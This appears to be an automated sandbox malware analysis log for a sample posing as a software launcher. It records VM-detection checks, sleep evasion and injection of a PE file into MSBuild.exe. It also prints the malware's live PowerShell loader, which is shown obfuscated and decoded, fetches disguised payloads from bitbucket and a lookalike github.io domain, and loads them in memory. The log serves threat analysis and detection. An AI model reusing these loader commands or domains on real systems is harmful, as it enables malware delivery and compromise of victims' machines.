Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1862	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1517	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5327	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4474	Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-2346

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324	Thread sleep count: 5327 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2324	Thread sleep count: 4474 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7000	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7608	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD6204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

0_2_00007FF66FD6204C

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD664E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00007FF66FD664E4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: svchost.exe, 00000007.00000002.2393784517.000001FDC462B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000007.00000002.2394760207.000001FDC9C54000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.1401843157.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.1400725047.00000000015BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 14_2_0044E690 LdrInitializeThunk,

14_2_0044E690

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

0_2_00007FF66FD61D28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD68494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF66FD68494
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Code function: 0_2_00007FF66FD68790 SetUnhandledExceptionFilter,		0_2_00007FF66FD68790

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_6656.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, Progrgdfam3.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, Progrgdfam3.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, Progrgdfam3.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, Progrgdfam3.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
Source: 6.2.powershell.exe.15eb0f20000.0.raw.unpack, Progrgdfam3.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 454000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 465000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 11FC008	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 